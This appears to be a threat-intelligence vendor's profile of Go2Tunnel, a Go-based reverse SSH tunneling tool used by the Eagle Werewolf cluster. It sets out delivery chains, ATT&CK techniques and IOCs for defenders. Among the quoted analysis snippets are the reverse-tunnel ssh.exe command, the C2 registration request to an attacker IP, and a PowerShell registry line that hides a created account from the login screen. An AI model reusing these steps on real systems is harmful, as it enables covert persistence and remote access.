Go2Tunnel
Go2Tunnel is a Go-based SSH tunneling tool used by the Eagle Werewolf cluster to establish and maintain reverse SSH tunnels from compromised Windows hosts. It has been observed as part of multi-stage phishing and Telegram-delivered intrusion chains targeting government and industrial organizations and individuals involved in UAV production and engineering. In one documented campaign, a phishing-delivered archive disguised as a 1C-related file led to execution of a patched .NET installer component that decrypted a Go dropper; that dropper unpacked executables, scripts, SSH keys, and configuration files, created a local user named "config," installed files under "C:\Program Files\System Event Service," started SSH services, granted privileges to the SSHD service account, and launched Go2Tunnel under filenames including "shh-tunnel.exe" and later "syseventservice-update.exe." In Eagle Werewolf activity linked to February 2026 Starlink-themed lures, Go2Tunnel was also used alongside Rust and Go droppers and AquilaRAT to support persistent remote access.
Go2Tunnel reads tunnel parameters from local configuration files such as "ssh_tunnel_config" or "syseventservice-update_config" and launches SSH with reverse port forwarding in the form "ssh.exe -R <ServerTunnelPort>:127.0.0.1:22" to expose the victim’s local SSH service. The SSH command uses the key file "C:\Program Files\System Event Service\event-server" and enables options including disabled strict host key checking, exit-on-forward-failure, and server alive interval settings. If a tunnel port is not predefined, Go2Tunnel can request one by sending an HTTP POST to "http://<serverHostname>:<ServerWebPort>/tunnel/register." In a newer observed version, it supported a "--db" flag for console execution with detailed logging and sent registration data including machine ID, computer name, generated username, current username, and generated password to "/tunnel/register" on 145.223.70[.]69:80. The server response supplied the SSH tunnel port, a Windows public key, a tunnel private key, and a server host key. Go2Tunnel then wrote the returned public key into authorized_keys for both the current user and the attacker-created user before starting the reverse tunnel.
The malware monitors tunnel health by checking for an established TCP connection to the configured SSH server and port via PowerShell Get-NetTCPConnection; if the check fails, it terminates the SSH process, resolves the configured address again, and restarts the tunnel. High-confidence infrastructure and indicators directly associated with Go2Tunnel activity in the provided content include IP addresses 16.16.179.83, 5.252.22.10, and 145.223.70[.]69, as well as SHA-256 hashes 15b3dcd795d417c69a627e13382800cc0cf005e9f5d0345e22a02f460b052ea1, 2de2c9ab37ce5abfcd7e9018b1cb00066209b0b9ecdf70249148f53389dca5b1, 5faa4da85e2657682fd40f5a86d61e87a3e70c3dff81335f226437c755a89f4a, 6aa1fc0c2b7a01952b92e7af4f69fc602d34da95a872c57e7cfe34e918086c89, 957a9705b200cd0f059d62d7b21e97db260b9b6c0c5ddf20c38d236103cb799b, and fac77b7f1150c00dd5ca9da0f93e2f073a7eb70e2f4fd82a267afbc938a6e175.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Eagle Werewolf’s arsenal includes the following malware: C# dropper (used in previous campaigns) Rust dropper Go dropper Go2Tunnel (SSH tunneling tool) AquilaRAT
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 techniqueExecution
2 techniquesпроверяет, работает ли сервер, при помощи команды ps1: -Command "Get-NetTCPConnection -RemoteAddress <serverHostname> -RemotePort <ServerSshPort> -State Established -OwningProcess <sshProcess_Pid>"
The URL hxxps://battleflight[.]org/download/installer hosted the executable BattleFlight-Install-v11.0.3.exe, a C# dropper disguised as an installer for a drone pilot training simulator.
Persistence
6 techniquesSubsequently, it attempts to add the new account to the Administrators group.
Большинство файлов — это полный набор для настройки SSH-соединения, публичные и приватные ключи и конфиги. Скрипты... запускают SSHD и ssh-agent, настроив публичный и приватный ключ.
Subsequently, it attempts to add the new account to the Administrators group.
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Name $sshUserName -Value 0 -Type DWord
Скрипты выполняют следующие действия: Создают нового юзера с кредами: $sshUserName = "config"
inst_u.ps1 also writes an event... The script then checks for the account $sshUserName and, if necessary, creates it and sets the password generated by common.ps1.
Privilege Escalation
3 techniquesSubsequently, it attempts to add the new account to the Administrators group.
Большинство файлов — это полный набор для настройки SSH-соединения, публичные и приватные ключи и конфиги. Скрипты... запускают SSHD и ssh-agent, настроив публичный и приватный ключ.
Stealth
6 techniquesThe appwiz.cpl applet is packed with UPX and obfuscated with Oreans Code Virtualizer.
The dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
В архиве с громким названием 1С_модуль_заказа_дрон-v11.zip лежит файлик СВЯЗЬ РЭБ список Гум.exe со знакомым всем желтым значком «1С». При запуске файла пользователь видит стандартное окно загрузки «1C:Enterprise 8.3» с последующим открытием базы данных.
At the final stage of execution, the Rust dropper deletes the insider-[a-zA-Z0-9]{6} directory.
В методе InitManifest расшифровывают ресурс _1C_Module.tmp и сохраняют его в папке temp. Расшифровываемый файл оказывается Go-дроппером, который расшифровывает 2️⃣ 3️⃣ файла.
the script adds a configuration string to the registry to hide the new account from the login screen.
Defense Impairment
1 techniqueLateral Movement
1 techniqueСкрипты... запускают SSHD и ssh-agent... Он вытаскивает из рядом лежащего конфига ssh_tunnel_config ... порты для создания туннеля: C:\Program Files\System Event Service\ssh.exe -R <ServerTunnelPort> :127.0.0.1:22
Collection
1 techniqueThe updater.exe executable is a Go dropper that unpacks embedded gzip archives and launches final stage loaders.
Command and Control
3 techniquesВ случае когда serverTunnelPort не указан, выполняется POST-запрос по следующему адресу: http://<serverHostname>:<ServerWebPort>/tunnel/register
Этот экзешник написан на Go и представляет собой инструмент для установки туннеля... ssh.exe -R <ServerTunnelPort> :127.0.0.1:22 -N -T -i ...
The loader then fetches the Node.js interpreter (if it is not present in the system) and the next stage obfuscated JS script.
IOCs tracked for this family
21 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An SSH tunneling tool used to establish reverse tunnels to attacker infrastructure. It registers with the C2 to obtain tunnel parameters and keys, updates configuration, writes authorized_keys entries, and launches ssh.exe with reverse port forwarding.
An SSH tunneling tool used to establish reverse tunnels. It registers with a C2 server to obtain tunnel parameters and keys, writes authorized_keys entries for local users, updates tunnel configuration, and launches ssh.exe with reverse port forwarding.
SSH tunneling tool used to establish reverse tunnels to attacker infrastructure. It registers the host with C2, receives keys and tunnel parameters, writes authorized_keys entries, and launches ssh.exe for reverse port forwarding.
Go-based tunneling tool dropped from a fake 1C-themed installer. It establishes a reverse SSH tunnel using bundled SSH binaries, keys, and configs, optionally registers for a tunnel port over HTTP, monitors tunnel health, and restarts the SSH process if connectivity is lost.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.